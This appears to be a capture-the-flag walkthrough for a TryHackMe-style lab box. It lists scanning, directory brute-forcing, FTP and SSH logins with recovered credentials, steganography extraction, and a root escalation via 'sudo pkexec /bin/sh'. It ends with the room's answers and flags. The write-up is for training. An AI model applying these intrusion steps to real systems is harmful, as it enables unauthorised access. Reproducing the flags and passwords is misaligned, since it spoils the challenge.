rustscan -a 10.10.73.61 --range 0-65535 --ulimit 5000
#faster alternative to nmap
gobuster dir -u http://10.10.73.61 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,txt,html,bak -z
nikto -h 10.10.73.61
gobuster dir -u http://10.10.73.61/island -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,txt,html,bak -z
gobuster dir -u http://10.10.73.61/island/2100 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,txt,html,bak,ticket -z
ftp 10.10.73.61
mget *
#get all files
pwd
#we are in /home/vigilante
cd ..
ls
#there are two users in home, slade and vigilante
exit
#exit ftp
exiftool Leave_me_alone.png
#shows file format error
file Leave_me_alone.png
xxd Leave_me_alone.png | head
#shows magic numbers
xxd Leave_me_alone.png| head -1
#shows only first line
xxd -r -p -o 0 <(echo 8950 4e47 0d0a 1a0a) Leave_me_alone.png
#replaces the incorrect magic numbers
xxd Leave_me_alone.png| head -1
file Leave_me_alone.png
#this is correct PNG now
steghide info aa.jpg
#shows that there is a file embedded
steghide extract -sf aa.jpg
#password is the passphrase
ssh slade@10.10.172.207
ls -la
cat user.txt
cat .Important
#gives us clue
find / -name 'Secret_Mission' 2>/dev/null
cat /usr/src/Secret_Mission
sudo -l
#check for commands that we can run as sudo
#exploit from GTFObins
sudo pkexec /bin/shRustscan shows the following ports & services:
* 21 - ftp
* 22 - ssh
* 80 - http
* 111 - rpcbind
* 38722 - unknown
Using Gobuster, we get the following directories:
* /index.html
* /island
* /server-status
The /island page gives us the code word 'vigilante'.
We can use gobuster in the /island directory as well, which gives us the page /2100.
Further, we can use gobuster on /island/2100, but we will include 'ticket' as an extension as well as it is given in the comments of the webpage.
This gives us a page called /green_arrow.ticket
Visiting /island/2100/green_arrow.ticket gives us a token to get into Queen's Gambit - RTy8yhBQdscX
Decoding this code from base58 using CyberChef gives us the string '!#th3h00d'.
Now we can try to log into FTP using creds vigilante:!#th3h00d; we succeed and we transfer the files to our system.
Furthermore, ftp shows two users - slade and vigilante - we can use this info while logging into SSH.
Back to the files we found; one of the image files, Leave_me_alone.png, shows a file format error.
On using xxd, we get to know that the .png file does not have the correct magic numbers.
The required magic numbers for a .png file are "89 50 4e 47 0d 0a 1a 0a".
Now the .png image shows up properly.
It shows the text 'password' highlighted; this hints us towards stego.
Using steghide, we check for clues hidden in each image; aa.jpg leads us to ss.zip, using the passphrase 'password'.
ss.zip contains two files: passwd.txt and shado.
The passwd.txt file contains a note, and the shado file has the text 'M3tahuman'; we can try this for SSH login.
We try vigilante:M3tahuman for SSH, but this does not work; however the creds slade:M3tahuman work.
After getting user flag, viewing hidden files show us .Important, which contains a clue; we need to find 'Secret_Mission' for privesc.
This file gives us another clue about 'super powers'; we can check commands that we can run as sudo.
This shows that we can run /usr/bin/pkexec as sudo; and we have an exploit for that on GTFObins.
Following the exploit will get us root access.-
What is the Web Directory you found? - 2100
-
What is the filename you found? - green_arrow.ticket
-
What is the FTP password? - !#th3h00d
-
What is the file name with SSH password? - shado
-
user.txt - THM{P30P7E_K33P_53CRET5__C0MPUT3R5_D0N'T}
-
root.txt - THM{MY_W0RD_I5_MY_B0ND_IF_I_ACC3PT_YOUR_CONTRACT_THEN_IT_WILL_BE_COMPL3TED_OR_I'LL_BE_D34D}